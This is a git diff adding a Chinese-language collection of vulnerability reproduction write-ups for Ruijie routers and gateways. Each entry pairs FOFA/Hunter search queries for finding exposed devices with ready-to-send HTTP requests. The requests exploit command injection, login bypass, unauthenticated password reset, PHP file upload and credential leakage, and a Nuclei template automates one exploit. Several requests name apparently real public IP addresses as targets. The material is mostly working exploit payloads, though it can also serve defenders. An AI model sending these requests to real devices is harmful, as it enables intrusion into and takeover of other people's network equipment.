@@ -0,0 +1,52 @@ +# 锐捷EG易网关vpn_quickset_service远程代码执行漏洞 + +**一、漏洞简介** + +锐捷 EG易网关cli存在后台远程命令执行漏洞。 + + **二、影响版本** + +`锐捷EG易网关` +**三、资产测绘** + +`app="Ruijie-EG易网关"` +●登录页面 + + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/u1f031-bFfjq_s9P/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-921195.webp) + + +**四、漏洞复现** +1、通过弱口令或账号密码泄露漏洞登录后台获取cookie + + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/u1f031-bFfjq_s9P/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-254245.webp) + +```plain +POST /itbox_pi/vpn_quickset_service.php?a=set_vpn HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin +X-Requested-With: XMLHttpRequest +Host: 117.40.253.197:4430 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 27 + +ip=|cat /etc/passwd >1.txt| +``` + +![1714062843270-2d58deca-03fd-4c15-9993-9bfa44ecc958.png](./img/u1f031-bFfjq_s9P/1714062843270-2d58deca-03fd-4c15-9993-9bfa44ecc958-431455.png) + +写入文件地址 + +```plain +/itbox_pi/1.txt +``` + +![1714062857083-b23e439d-73d8-4c6c-a7e5-533d044e9763.png](./img/u1f031-bFfjq_s9P/1714062857083-b23e439d-73d8-4c6c-a7e5-533d044e9763-938105.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md b/锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md new file mode 100644 index 0000000..4eb6274 --- /dev/null +++ b/锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md 
@@ -0,0 +1,49 @@ +# 锐捷 EG易网关wifi.php存在后台远程命令执行漏洞 + +**一、漏洞简介** +锐捷 EG易网关cli存在后台远程命令执行漏洞。 +**二、影响版本** + +```java +锐捷EG易网关 +``` + + +**三、资产测绘** + +```java +app="Ruijie-EG易网关" +``` + + +●登录页面 + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/gsYMn6zWg3mjpLNP/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-492488.png) + +# 四、漏洞复现 +1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie + +![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/gsYMn6zWg3mjpLNP/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-000905.png) + +2. 通过上一步获取的cookie执行命令 + +```java +POST /itbox_pi/wifi.php?a=branch_wifi HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=ihvlofd9j5bfjbikfrtng7p9f5; helpKey=home_sys;user=admin +X-Requested-With: XMLHttpRequest +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 16 + +province=|whoami +``` + +![1714060259608-a34db878-2cb8-4637-b828-d46fdaf7a329.png](./img/gsYMn6zWg3mjpLNP/1714060259608-a34db878-2cb8-4637-b828-d46fdaf7a329-361904.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷EG易网关管理员账号密码泄露漏洞.md b/锐捷EG易网关管理员账号密码泄露漏洞.md new file mode 100644 index 0000000..80fbf09 --- /dev/null +++ b/锐捷EG易网关管理员账号密码泄露漏洞.md 
@@ -0,0 +1,46 @@ +# 锐捷 EG易网关管理员账号密码泄露漏洞 + +**一、漏洞简介** +锐捷EG易网关 login.php存在 CLI命令注入,导致管理员账号密码泄露漏洞 +**二、影响版本** + +```java +锐捷EG易网关 +``` + + +**三、资产测绘** + +```java +app="Ruijie-EG易网关" +``` + + +●登录页面 + +![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/MxcQgnIcXQfNL8qR/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-391281.png) + + +**四、漏洞复现** + +```java +POST /login.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 49 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip + +username=admin&password=admin?show+webmaster+user +``` + + +![1710773369558-0b735db6-3ccf-4af3-9aaf-4ba360e3dd91.png](./img/MxcQgnIcXQfNL8qR/1710773369558-0b735db6-3ccf-4af3-9aaf-4ba360e3dd91-254157.png) + +![1710774024223-cd35f9b5-4b70-45e0-abf7-47aeefe164d6.png](./img/MxcQgnIcXQfNL8qR/1710774024223-cd35f9b5-4b70-45e0-abf7-47aeefe164d6-268712.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷EWEBflwo.contro存在远程命令执行漏洞.md b/锐捷EWEBflwo.contro存在远程命令执行漏洞.md new file mode 100644 index 0000000..b6464f9 --- /dev/null +++ b/锐捷EWEBflwo.contro存在远程命令执行漏洞.md 
@@ -0,0 +1,111 @@ +# 锐捷EWEB flwo.contro存在远程命令执行漏洞 + +# 一、漏洞简介 +锐捷EWEB flwo.contro存在远程命令执行漏洞 + +# 二、影响版本 ++ 锐捷NBR路由器 + +# 三、资产测绘 ++ hunter`app.name=="Ruijie 锐捷 EWEB"` ++ fofa`title="锐捷网络-EWEB网管系统"` ++ 登录页面![1715322581874-fa3273b6-555a-497f-a4ef-ba0b586cab54.png](./img/TFOZ7WRYk6ynbZLx/1715322581874-fa3273b6-555a-497f-a4ef-ba0b586cab54-866973.png) + +# 四、漏洞复现 + 先发送数据包,获取cookie + +```http +POST /ddi/server/login.php HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 + +username=admin&password=admin? +``` + +![1715323041665-52c124a1-a313-42dd-8797-fe5f1386b46c.png](./img/TFOZ7WRYk6ynbZLx/1715323041665-52c124a1-a313-42dd-8797-fe5f1386b46c-753050.png) + + 使用获取cookie执行命令 + +```http +cm0gLXJmIC4uL2lrbTEyMy50eHQgJiYgZWNobyBIZWxsb1dvcmxkID4gLi4vaWttMTIzLnR4dCAyPiYx +Bsae64解码 +rm -rf ../ikm123.txt && echo HelloWorld > ../ikm123.txt 2>&1 +``` + +```http +POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 +Connection: close +Content-Length: 160 +Content-Type: application/x-www-form-urlencoded +Cookie: RUIJIEID=e3t2n743strq8lu1anqod3bhu6; +Accept-Encoding: gzip + +type=%7Cbash+-c+%27echo+cm0gLXJmIC4uL2lrbTEyMy50eHQgJiYgZWNobyBIZWxsb1dvcmxkID4gLi4vaWttMTIzLnR4dCAyPiYx+%7C+base64+-d+%7C+bash+%26%26+exit+0%27 +``` + +![1715323240193-01afe809-d76e-4d69-8be8-d16470a63556.png](./img/TFOZ7WRYk6ynbZLx/1715323240193-01afe809-d76e-4d69-8be8-d16470a63556-647634.png) + + 3、命令执行成功 + +```http +/ikm123.txt +``` + +![1715323343958-2af6502d-a935-4e8d-8360-dcf53b32a982.png](./img/TFOZ7WRYk6ynbZLx/1715323343958-2af6502d-a935-4e8d-8360-dcf53b32a982-871259.png) + +## 五、 Nuclei +```http +id: RJEWEB-flwo-contro-RCE + +info: + name: 锐捷 EWEB-RCE-flwo.contro + author: haoguoguo + severity: high + metadata: + fofa-query: title="锐捷网络-EWEB网管系统" +variables: + filename: "{{to_lower(rand_base(5))}}" + boundary: "{{to_lower(rand_base(20))}}" +http: + - raw: + - | + POST /ddi/server/login.php HTTP/1.1 + Host: 
{{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 + + username=admin&password=admin? + + - | + POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 + Connection: close + Content-Length: 160 + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + type=%7Cbash+-c+%27echo+{{base64("rm -rf ../{(unknown)}.txt && echo HelloWorld > ../{(unknown)}.txt 2>&1")}}+%7C+base64+-d+%7C+bash+%26%26+exit+0%27 + + - | + GET /{(unknown)}.txt HTTP/1.1 + Host:{{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Content-Length: 0 + + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"HelloWorld") +``` + +![1715322761109-4303e648-4b49-4d38-8c6e-cb1348e035dc.png](./img/TFOZ7WRYk6ynbZLx/1715322761109-4303e648-4b49-4d38-8c6e-cb1348e035dc-278160.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷EWEB路由器auth远程命令执行漏洞.md b/锐捷EWEB路由器auth远程命令执行漏洞.md new file mode 100644 index 0000000..fe9abcf --- /dev/null +++ b/锐捷EWEB路由器auth远程命令执行漏洞.md 
@@ -0,0 +1,38 @@ +# 锐捷 EWEB路由器 auth 远程命令执行漏洞 + +# 一、漏洞简介 +锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线,解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞,攻击者可以任意执行服务器端的代码,编写后门,获得服务器权限,进而控制整个web服务器。 + +# 二、影响版本 ++ 锐捷 EWEB路由器 + +# 三、资产测绘 ++ fofa`body="cgi-bin/luci" && body="#f47f3e"` ++ 特征 + +![1709883604157-a88eaed0-f449-414c-86ab-4951422896ee.png](./img/jMJPLGwCvErQjGMK/1709883604157-a88eaed0-f449-414c-86ab-4951422896ee-226270.png) + +# 四、漏洞复现 +```plain +POST /cgi-bin/luci/api/auth HTTP/1.1 +Host: +Content-Type: application/json +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +{"method":"checkNet","params":{"host":"`echo c149136B>AD0D5b8c.txt`"}} +``` + +![1709883649047-81989889-fb44-46a7-bfdc-3850b3fdc6f4.png](./img/jMJPLGwCvErQjGMK/1709883649047-81989889-fb44-46a7-bfdc-3850b3fdc6f4-707818.png) + +获取命令执行结果 + +```plain +/cgi-bin/AD0D5b8c.txt +``` + +![1709883674250-cfa2c2d1-6da8-4b48-9091-344fac04b808.png](./img/jMJPLGwCvErQjGMK/1709883674250-cfa2c2d1-6da8-4b48-9091-344fac04b808-337780.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷NBR系列多款路由器存在管理员密码重置漏洞.md b/锐捷NBR系列多款路由器存在管理员密码重置漏洞.md new file mode 100644 index 0000000..42ee11d --- /dev/null +++ b/锐捷NBR系列多款路由器存在管理员密码重置漏洞.md 
@@ -0,0 +1,43 @@ +# 锐捷NBR系列多款路由器存在管理员密码重置漏洞 + +**一、漏洞简介** +锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在存在管理员密码重置漏洞,攻击者通过漏洞重置密码登录后台 +**二、影响版本** + +Ruijie-NBR路由器 + +**三、资产测绘** + +```plain +body="上层网络出现异常,请检查外网线路或联系ISP运营商协助排查" +``` + +![1717734645117-802010e5-a75c-45f1-8f4c-551281d27278.png](./img/kB-drvIkcHwBbcTn/1717734645117-802010e5-a75c-45f1-8f4c-551281d27278-249342.png) + + +**四、漏洞复现** + +```plain +GET /base_network.asp?isbase64=1&reboot=1&shortset=1&time_type=auto&exec_service=ntpc-restart&http_lanport=80&remote_management=1&http_wanport=9999&http_username=admin&http_gname_en=0&http_passwd=admin&_= HTTP/1.1 +Host: +Accept: application/json, text/javascript, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Referer: 111.59.193.189:9999/index.htm?_1708839153 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: wys_userid=; userid=admin; gw_userid=admin,gw_passwd= +Connection: close +``` + +![1717734727800-954b048d-0b4f-45f0-af30-40f0e26df8af.png](./img/kB-drvIkcHwBbcTn/1717734727800-954b048d-0b4f-45f0-af30-40f0e26df8af-577558.png) + +```plain +使用admin/admin登录系统 +``` + +![1717735035159-6a15be6b-d351-4ebd-bce1-f071a0f688c8.png](./img/kB-drvIkcHwBbcTn/1717735035159-6a15be6b-d351-4ebd-bce1-f071a0f688c8-178013.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷NBR路由器fileupload.php任意文件上传漏洞.md b/锐捷NBR路由器fileupload.php任意文件上传漏洞.md new file mode 100644 index 0000000..dedb46d --- /dev/null +++ b/锐捷NBR路由器fileupload.php任意文件上传漏洞.md 
@@ -0,0 +1,50 @@ +# 锐捷NBR路由器fileupload.php任意文件上传漏洞 + +# 一、漏洞简介 +锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。 + +# 二、影响版本 ++ 锐捷NBR路由器 + +# 三、资产测绘 ++ hunter`app.name=="Ruijie 锐捷 EWEB"` ++ 登录页面 + +![1693802366372-530b8f97-01f8-4fac-a782-d3306d3ea54e.png](./img/jFBa7SreAbBovuDn/1693802366372-530b8f97-01f8-4fac-a782-d3306d3ea54e-629998.png) + +# 四、漏洞复现 +```plain +POST /ddi/server/fileupload.php HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 219 + +--00content0boundary00 +Content-Disposition: form-data; name="uploadDir" + +upload +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="1.php" + + +--00content0boundary00-- + +``` + +![1693802445069-749e8cd1-a5e8-4d46-8414-3f97cb5d244a.png](./img/jFBa7SreAbBovuDn/1693802445069-749e8cd1-a5e8-4d46-8414-3f97cb5d244a-776042.png) + +上传文件位置 + +```plain +https://xx.xx.xx.xx/ddi/server/upload/1.php +``` + +![1693802535846-9a7f6ed5-7c93-4144-9561-7097e5d12ec5.png](./img/jFBa7SreAbBovuDn/1693802535846-9a7f6ed5-7c93-4144-9561-7097e5d12ec5-353619.png) + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md b/锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md new file mode 100644 index 0000000..87b4bd2 --- /dev/null +++ b/锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md 
@@ -0,0 +1,59 @@ +# 锐捷NBR路由器guestIsUp.php远程命令执行漏洞 + +**一、漏洞简介** +锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。 +**二、影响版本** + +Ruijie-NBR路由器 + +**三、资产测绘** + +```plain +app="Ruijie-NBR路由器" +``` + +●登录页面![1711871186381-4330c91f-724e-44b0-9221-324f4adec915.png](./img/Ug2v7cQOIB8QjHRA/1711871186381-4330c91f-724e-44b0-9221-324f4adec915-992891.png) + + +**四、漏洞复现** + +1.执行查看用户并写入当前目录test.txt的poc + +```plain +POST /guest_auth/guestIsUp.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Connection: close +Content-Length: 45 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt +``` + +![1711872621387-84b10c76-c77a-483d-806e-a321c3858a5b.png](./img/Ug2v7cQOIB8QjHRA/1711872621387-84b10c76-c77a-483d-806e-a321c3858a5b-868464.png) + +2.访问该文件,得到回显 + +```plain +GET /guest_auth/test.txt HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Connection: close +Accept-Encoding: gzip, deflate +``` + +![1711872633663-ac208ec4-6962-4bf6-bb9b-75b75790275c.png](./img/Ug2v7cQOIB8QjHRA/1711872633663-ac208ec4-6962-4bf6-bb9b-75b75790275c-292423.png) + + + + +若有收获,就点个赞吧 + + + + + + +> 更新: 2024-06-24 11:42:26 +> 原文: \ No newline at end of file diff --git a/锐捷RG-BCR860路由器命令执行漏洞(CVE-2023-3450).md b/锐捷RG-BCR860路由器命令执行漏洞(CVE-2023-3450).md new file mode 100644 index 0000000..97e2b45 --- /dev/null +++ b/锐捷RG-BCR860路由器命令执行漏洞(CVE-2023-3450).md 
@@ -0,0 +1,46 @@ +# 锐捷RG-BCR860路由器命令执行漏洞(CVE-2023-3450) + +# 一、漏洞简介 +RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验 。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。 + +# 二、影响版本 ++ 锐捷路由器RG-BCR860 + +# 三、资产测绘 ++ fofa`icon_hash="-399311436"` + +![1692606754994-2f1216a0-282b-45a6-94fc-b7f5dd405745.png](./img/m9qo6lOTSwrcQIzK/1692606754994-2f1216a0-282b-45a6-94fc-b7f5dd405745-691021.png) + ++ 登录页面 + +![1692606877528-52b592a6-ef53-44d7-8dbc-8ffe1299e9e6.png](./img/m9qo6lOTSwrcQIzK/1692606877528-52b592a6-ef53-44d7-8dbc-8ffe1299e9e6-740734.png) + +# 四、漏洞复现 +1. 该漏洞属于后台漏洞,需要登录后台(默认密码:admin) + +![1692606937330-5391e9ce-3c7b-4c56-8529-034a3d1a2a32.png](./img/m9qo6lOTSwrcQIzK/1692606937330-5391e9ce-3c7b-4c56-8529-034a3d1a2a32-877796.png) + +2. 漏洞位置:网络诊断->Tracert检测->输入`127.0.0.1;cat /etc/passwd` + +![1692607017024-349a76e0-e5a3-4a4a-83d1-acaa51b2c694.png](./img/m9qo6lOTSwrcQIzK/1692607017024-349a76e0-e5a3-4a4a-83d1-acaa51b2c694-896230.png) + +3. 数据包 + +```plain +GET /cgi-bin/luci/;stok=8bbbc7db8f9e3d2d972bd7ab13f21a75/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=20 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: sysauth=698164456dede213f8f15cebba269273 +``` + +![1694586407185-44b0cbef-6fc5-4191-be0e-3cebec716a20.png](./img/m9qo6lOTSwrcQIzK/1694586407185-44b0cbef-6fc5-4191-be0e-3cebec716a20-599627.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷RG-EW1200G路由器后台命令执行.md b/锐捷RG-EW1200G路由器后台命令执行.md new file mode 100644 index 0000000..e2a21f3 --- /dev/null +++ b/锐捷RG-EW1200G路由器后台命令执行.md 
@@ -0,0 +1,43 @@ +# 锐捷RG-EW1200G路由器后台命令执行 + +# 一、漏洞简介 +锐捷网络RG-EW1200G 存在后台命令执行漏洞,登录路由器后,可执行任意命令,控制内部网络 + +# 二、影响版本 ++ RG-EW1200G无线路由器 + +# 三、资产测绘 +```plain +body="/static/js/app.09df2a9e44ab48766f5f.js" +``` + +![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/T47hLu2WF7iLYEL_/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-076485.png) + ++ 登录页面 + +![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/T47hLu2WF7iLYEL_/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-236414.png) + +# 四、漏洞复现 +```plain +POST /bf/tracert HTTP/1.1 +Host: +Content-Length: 53 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Origin: http://175.167.44.37:6060 +Referer: http://175.167.44.37:6060/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cda05348636f998dddeff1d3f3fe1fc8d87ed86b4b4818536 +Connection: close + +{"tracert_address":"||echo `id`","is_first_req":true} +``` + +![]() + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷RG-EW1200G路由器未授权任意密码修改.md b/锐捷RG-EW1200G路由器未授权任意密码修改.md new file mode 100644 index 0000000..2f13820 --- /dev/null +++ b/锐捷RG-EW1200G路由器未授权任意密码修改.md 
@@ -0,0 +1,43 @@ +# 锐捷RG-EW1200G路由器未授权任意密码修改 + +# 一、漏洞简介 +锐捷网络RG-EW1200G 存在未授权任意密码修改漏洞,允许任何用户未授权修改密码。登录路由器,获取敏感信息,控制内部网络 + +# 二、影响版本 ++ RG-EW1200G无线路由器 + +# 三、资产测绘 +```plain +body="/static/js/app.09df2a9e44ab48766f5f.js" +``` + +![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/ZZUhORDFnoBu0aNb/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-295961.png) + ++ 登录页面 + +![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/ZZUhORDFnoBu0aNb/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-601664.png) + +# 四、漏洞复现 +```plain +POST /api/sys/set_passwd HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Length: 0 +Content-Type: application/x-www-form-urlencoded +DNT: 1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +{"username":"admin","admin_new":"123456"} +``` + +![1711865641902-da372739-98a1-4b1e-b25e-286ffb287b58.png](./img/ZZUhORDFnoBu0aNb/1711865641902-da372739-98a1-4b1e-b25e-286ffb287b58-292126.png) + +![1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af.png](./img/ZZUhORDFnoBu0aNb/1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af-036339.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷RG-EW1200G路由器登录绕过(CVE-2023-4415).md b/锐捷RG-EW1200G路由器登录绕过(CVE-2023-4415).md new file mode 100644 index 0000000..d6eed6b --- /dev/null +++ b/锐捷RG-EW1200G路由器登录绕过(CVE-2023-4415).md 
@@ -0,0 +1,44 @@ +# 锐捷RG-EW1200G路由器登录绕过(CVE-2023-4415) + +# 一、漏洞简介 +锐捷网络RG-EW1200G 存在登录绕过逻辑漏洞,允许任何用户无需密码即可获得设备管理员权限。登录路由器,获取敏感信息,控制内部网络 + +# 二、影响版本 ++ RG-EW1200G无线路由器 + +# 三、资产测绘 +```plain +body="/static/js/app.09df2a9e44ab48766f5f.js" +``` + +![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/3ET-mOfgefETA8gY/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-166465.png) + ++ 登录页面 + +![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/3ET-mOfgefETA8gY/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-381136.png) + +# 四、漏洞复现 +1. 输入任意密码抓包然后修改usernam为2 + +```plain +POST /api/sys/login HTTP/1.1 +Host: +Content-Length: 63 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +{"username":"2","password":"dsaff","timestamp":1695813951000} +``` + +![1711860903082-cb6573f6-4e1e-458e-97c7-1f16a736665e.png](./img/3ET-mOfgefETA8gY/1711860903082-cb6573f6-4e1e-458e-97c7-1f16a736665e-437495.png) + +![1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af.png](./img/3ET-mOfgefETA8gY/1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af-026357.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷RG-ISG账号密码泄露漏洞.md b/锐捷RG-ISG账号密码泄露漏洞.md new file mode 100644 index 0000000..d383e87 --- /dev/null +++ b/锐捷RG-ISG账号密码泄露漏洞.md 
@@ -0,0 +1,32 @@ +# 锐捷RG-ISG账号密码泄露漏洞 + +**一、漏洞简介** + +锐捷ISG存在账号密码泄露漏洞,可以获取密码的md5值, 解密后获取后台权限 + +**二、影响版本** +锐捷RG-ISG +**三、资产测绘** + +`title="RG-ISG"` +●登录页面 + +![1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05.png](./img/rsF9R9NFuIVrcSRD/1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05-504193.webp) + + +**四、漏洞复现** + + +首页查看源代码,搜索persons 字段 + +![1712097097492-45caba67-a4aa-4bec-997c-e67d7a85d510.png](./img/rsF9R9NFuIVrcSRD/1712097097492-45caba67-a4aa-4bec-997c-e67d7a85d510-994591.png) + +![1712097137836-f93be1b8-8a0b-45a4-995c-75bade1d2434.png](./img/rsF9R9NFuIVrcSRD/1712097137836-f93be1b8-8a0b-45a4-995c-75bade1d2434-642070.png) + + + + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md b/锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md new file mode 100644 index 0000000..f5f8243 --- /dev/null +++ b/锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md @@ -0,0 +1,32 @@ +# 锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞 + +### 一、漏洞描述 +锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。 + +### 二、影响版本 +锐捷RG-UAC应用网关 + +### 三、资产测绘 +fofa:app="Ruijie-RG-UAC" + +特征: + +![1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115.png](./img/iuhRqqHjm3R_IJCE/1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115-825054.png) + +### 四、漏洞复现 +```plain +GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>dudesuite.txt|cat HTTP/1.1 +Host: xxx +Accept-Encoding: gzip +``` + +![1708679288910-596012c6-d177-41dc-a2b2-8cf937685e25.png](./img/iuhRqqHjm3R_IJCE/1708679288910-596012c6-d177-41dc-a2b2-8cf937685e25-057665.png) + +访问:https://xxx/view/systemConfig/management/dudesuite.txt + +![1708679132388-d1d1e207-cb68-40d9-8fb6-210f1fd42355.png](./img/iuhRqqHjm3R_IJCE/1708679132388-d1d1e207-cb68-40d9-8fb6-210f1fd42355-882522.png) + + + +> 更新: 2024-06-24 11:42:29 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md b/锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md new file mode 100644 index 0000000..d4ddc46 
